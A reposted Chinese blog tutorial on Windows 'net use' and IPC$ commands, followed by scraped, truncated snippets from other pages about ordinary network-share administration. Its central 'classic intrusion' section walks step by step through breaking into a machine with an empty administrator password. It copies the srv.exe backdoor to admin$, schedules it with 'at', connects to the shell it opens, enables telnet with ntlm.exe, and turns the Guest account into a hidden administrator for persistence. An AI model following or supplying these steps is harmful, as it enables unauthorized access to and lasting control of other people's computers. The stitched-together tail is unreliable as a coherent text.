本文为转载内容,感谢原作者辛勤劳动。原链接为:http://www.cnblogs.com/chinahbzm/articles/1423875.html

1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)

3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接
net use \\IP\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认

3 查看远程主机的共享资源(但看不到默认共享)
net view \\IP

4 查看本地主机的共享资源(可以看到本地的默认共享)
net share

5 得到远程主机的用户名列表
nbtstat -A IP

6 得到本地主机的用户列表
net user

7 查看远程主机的当前时间
net time \\IP

8 显示本地主机当前服务
net start

9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y

10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘

11 删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部

12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
14 开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del

九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
复制之前务必用net view \\IP这个命令看一下对方的共享情况
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

另外,你也可以根据返回的错误号分析原因:

错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码

在使用这种方法屏蔽网络映射功能时,只需要先打开系统的运行对话框,并在其中执行“cmd”字符串命令,将系统界面切换到MS-DOS命令行状态;接着在DOS提示符下执行“net use x:/del”字符串命令,就能将网络磁盘分区为“X”的网络映射连接断开了,要想快速地将本地计算机中所有的网络映射连接断开的话,只需要执行“net use * /del”字符串命令就可以了。

本文为转载内容,感谢原作者辛勤劳动。原链接为:http://www.cnblogs.com/chinahbzm/articles/1423875.html1)建立空连接:net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)2)建立非空连接:net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)3)映射默认共享:net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映...
WINDOWS 2003(或其他的 windows 服务器)在局域网共享文件时,有时候测试的时候要更换登陆的用户名。使用NET USE 命令可以方便处理。 1)删除已有的连接,避免出现“一个用户使用...多重连接”的问题。 net use * /delete 如果提示“列表是空的”,表示当前没有任何关联连接;如果提示“您有如下远程连接... 继续运行会取消连接”,输入“Y”或者“y”
解决不允许一个用户使用一个以上用户名与一个服务器或共享资源的多重连接          用net use 命令可以查看你当前与网络资源的连接,例如驱动器映射、IPC连接。使用该命令后,应该可以看到你和有资源连接。然后可以用net use * /del /y命令中断开所有连接。最后,你再次访问,应该就不会有这个提示了 Net Use 命令用法  使用net use 命令可以将远端的共享资源挂载到本地,即将共享目录映射到本地的指定位置。 假设现在存在两台机器,一台ip为10.13.0.99作为目标机器,一台ip为10.13.6.139作为本地机器,现在我想在本地机器(10.13.6.139)上将目标机器(10.13.0.99)的c盘映射为本地的z盘,则只需输入命令 net use z: \\10.13.0.99\c$ password / use r: use rname 成功挂载之后就可以在我的电脑处看到挂载的c盘内容 当想要共享某
net use \\ip地址 / use r:用户名 #指定局域网中某个电脑的访问用户名,如有密码会继续提示输入(密码可能不显示)。 net use \\ip地址 "密码" / use r:用户名 #直接输入密码型 net use #查看已连接的用户列表 net use * delete #删除已有连接,避免出现“一个用户使用多重连接”的问题。 net time \\ip地址 #查看指定电脑的时间 net use #查看本地主机的用户列表 net share .
1、学会使用Ping、IPConfig、TraceRt、Netstat、ARP、Net等常用网络命令。 2、学会配置网络接口IP属性(IP地址、子网掩码、默认网关)。 二、实验环境: windows 操作系列都可以,Cisco Packet Tracer 三、实验内容: 1、设置网络接口为自动获取IP地址方式。 运行IPConfig命令查看自己正在使用的网络参数信息,包括:接口类型、IP地址、子网掩码、默认网关、MAC地址、DNS服务器IP地址等信息。 445 是文件共享端口,就是说,pc1文件夹共享后,pc2通过账户密码即可更改、读取、完全控制该文件夹。 但是有个漏洞,就是如果net use r 路径写的不是文件夹,而是ipc$ 或者 c$,意味着pc2权限就会很大。 net use f: \10.1.1.11\test test666.com / use r:administrator net use \10.1.1.11\ipc$ test666.com / use r:administrator ipc$ 是 空连接的意.
公司共享服务器有两种文件目录:其一:对外文件目录;其二:对内文件目录(只能通过域登录才能有权访问) 但是,使用域登录不习惯的我,也为了避免老是注销当前系统切换到域帐户登录的麻烦,于是想到了NET USE 命令,它可以帮助我不注销系统也能访问“域”目录。以下请参考NET USE 命令详解 。 (本案例用到的NET USE 格式:net use 服务器的被访问目录 / use r:域名称\域登录账号